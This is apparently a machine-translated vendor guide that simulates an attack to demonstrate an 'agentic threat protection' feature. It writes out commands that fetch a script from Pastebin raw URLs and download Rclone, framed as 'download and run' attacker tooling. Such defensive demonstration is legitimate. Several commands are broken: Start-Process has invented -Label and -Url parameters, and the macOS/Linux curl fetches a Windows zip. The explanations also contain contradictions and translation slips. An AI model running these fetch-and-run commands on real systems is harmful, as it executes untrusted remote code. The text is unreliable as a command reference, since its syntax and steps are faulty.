概概览
代理威胁防护是一个安全引擎,在检测到威胁时主动应用动态控制,减少攻击面,提前缓解威胁,在发生任何影响之前。有关更多信息,请参阅什么是代理威胁防护?
本文模拟一个真实世界攻击场景,以展示代理威胁防护如何保护您的网络。虽然这不是一个代理威胁,但它展示了如何应用控制措施来防止类似技巧被用于代理攻击。
在此示例中,用户从Pastebin下载了一个脚本,攻击者尝试使用该脚本来检索执行未来攻击所需的其他高风险工具。代理威胁防护识别恶意行为并阻止工具的下载,在攻击进程和任何影响发生之前进行防御。
对此攻击的响应是完全自动化的。无需额外的规则。仅启用代理威胁防护即可防止攻击。
模拟此攻击:
下载高风险工具而不被阻止
从Pastebin下载脚本
尝试再次下载高风险工具。此时,下载被阻止。
注意:虽然这种情况不是自主的,但它说明了控制机制如何帮助防止类似技术在自主攻击中被使用。
条件
代理威胁防护已启用,操作设置为阻止
步骤 1: 下载高风险工具
为了展示代理威胁防护仅在其为恶意序列的组成部分时才阻止操作,首先下载Rclone,一个用于管理文件的开源命令行工具。攻击者通常将Rclone用作后妥协工具,因为它是合法的、强大的,并且与正常管理活动融为一体。
动作
从以下位置下载Rclone:
以下网址:
https://downloads.rclone.org/rclone-current-windows-amd64.zip在Windows设备上:
以下PowerShell命令:
Start-Process "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
在macOS/Linux设备上:
以下终端命令:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
结果
文件下载成功。
解释
这确认了在孤立的情况下,操作未被阻止,因为在可疑活动未发生时,该操作不被认为是恶意的。
步骤 2: 从Pastebin下载脚本
为了模拟攻击的开始,从Pastebin下载一个脚本,该脚本运行后下载常见的攻击者工具,例如用于远程访问和数据泄露的Rclone和AnyDesk。
动作
从Pastebin下载并运行脚本:
在Windows设备上:
以下PowerShell命令:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
在macOS/Linux设备上:
以下终端命令:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
结果
脚本运行并下载工具。动态控制已应用于主机,显示在代理威胁页面。有关更多信息,请参阅监控代理威胁防护
解释
代理威胁防护检测到可疑行为指标,主动实施控制以阻止后续恶意行为,在影响发生之前停止攻击。
步骤 3: 下载高风险工具
在模拟攻击中,攻击者试图下载Rclone。然而,由于此操作跟随下载Pastebin脚本的可疑活动,并且应用了控制,代理威胁防护阻止了Rclone下载。
动作
使用以下任意选项下载Rclone:
直接从Rclone站点下载:
https://downloads.rclone.org/rclone-current-windows-amd64.zip此PowerShell命令(在Windows上):
Start-Process -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"以下终端命令(开macOS/Linux):
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
结果
文件的下载被控制阻止。已缓解的威胁显示在代理威胁页面。
解释
与步骤1不同,此脚本在隔离环境中运行,因此被允许,现在由于之前有可疑行为,此脚本的下载被代理威胁防护阻止。
演示
此视频展示了这个模拟攻击的演示: